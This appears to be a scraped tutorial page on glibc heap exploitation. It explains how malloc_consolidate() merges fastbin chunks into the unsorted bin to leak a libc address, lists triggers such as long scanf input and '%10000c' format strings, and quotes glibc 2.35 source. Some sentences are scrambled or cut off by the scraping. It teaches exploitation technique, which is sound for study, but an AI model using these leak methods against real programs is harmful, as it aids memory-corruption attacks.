arrow-left

All pages
gitbookPowered by GitBook
1 of 1

Loading...

malloc_consolidate()

Consolidating fastbins

Earlier, I said that chunks that went to the unsorted bin would consolidate, but fastbins would not. This is technically not true, but they don't consolidate automatically; in order for them to consolidate, the function malloc_consolidate()arrow-up-right has to be called. This function looks complicated, but it essentially just grabs all adjacent fastbin chunks and combines them into larger chunks, placing them in the unsorted bin.

Why do we care? Well, UAFs and the like are very nice to have, but a Read-After-Free on a fastbin chunk can only ever leak you a heap address, as the singly-linked lists only use the fd pointer which points to another chunk (on the heap) or is NULL. We want to get a libc leak as well!

If we free enough adjacent fastbin chunks at once and trigger a call to malloc_consolidate(), they will consolidate to create a chunk that goes to the unsorted bin. The unsorted bin is doubly-linked, and acts accordingly - if it is the only element in the list, both fd and bk will point to a location in malloc_state, which is contained within libc.

This means that the more important thing for us to know is how we can trigger a largebin consolidation.

Some of the most important ways include:

  • Inputting a very long number into scanf (around 0x400 characters long)

    • This works because the code responsible for it manages a scratch_buffer and assigns it 0x400 bytes, but uses malloc when the data is too big (along with realloc

Both of these work because a largebin allocation triggers malloc_consolidate.By checking the calls to the function in (2.35), we can find other triggers.

circle-info

It's possible for earlier or later glibc versions to have a greater or lesser number of calls to a specific function, so make sure to check for your version! You may find another way exists.

The most common and most important trigger, a call to malloc() requesting a chunk of largebin size will .

There is another call to it in the section . This section is called when the top chunk has to be used to service the request. The checks if the top chunk is large enough to service the request:

If not, checks if there are fastchunks in the arena. If there are, it calls malloc_consolidate to attempt to regain space to service the request!

So, by filling the heap and requesting another chunk, we can trigger a call to malloc_consolidate().

(If both conditions fail,

if it gets even bigger than the heap chunk, and
free
at the end, so it works to trigger those functions too - great for triggering hooks!).
  • Inputting something along the lines of %10000c into a format string vulnerability also triggers a chunk to be created

  • _int_malloc
    falls back to esssentially using
    mmap
    to service the request).

    TODO

    Calling mtrimarrow-up-right will consolidate fastbins (which makes sense, given the name malloc_trim). Unlikely to ever be useful, but please do let me know if you find a use for it!

    When changing malloc options using mallopt, the fastbins are first consolidatedarrow-up-right. This is pretty useless, as mallopt is likely called once (if at all) in the program prelude before it does anything.

    malloc.carrow-up-right
    trigger a call to malloc_consolidate()arrow-up-right
    use_toparrow-up-right
    first if conditionarrow-up-right
    the next conditionarrow-up-right
    /*
       If this is a large request, consolidate fastbins before continuing [...]
     */
    
    else
      {
        idx = largebin_index (nb);
        if (atomic_load_relaxed (&av->have_fastchunks))
          malloc_consolidate (av);
      }
    if ((unsigned long) (size) >= (unsigned long) (nb + MINSIZE))
    {
        remainder_size = size - nb;
        remainder = chunk_at_offset (victim, nb);
        av->top = remainder;
        set_head (victim, nb | PREV_INUSE |
                  (av != &main_arena ? NON_MAIN_ARENA : 0));
        set_head (remainder, remainder_size | PREV_INUSE);
    
        check_malloced_chunk (av, victim, nb);
        void *p = chunk2mem (victim);
        alloc_perturb (p, bytes);
        return p;
    }
    else if (atomic_load_relaxed (&av->have_fastchunks))
    {
        malloc_consolidate (av);
        /* restore original bin index */
        if (in_smallbin_range (nb))
            idx = smallbin_index (nb);
        else
            idx = largebin_index (nb);
    }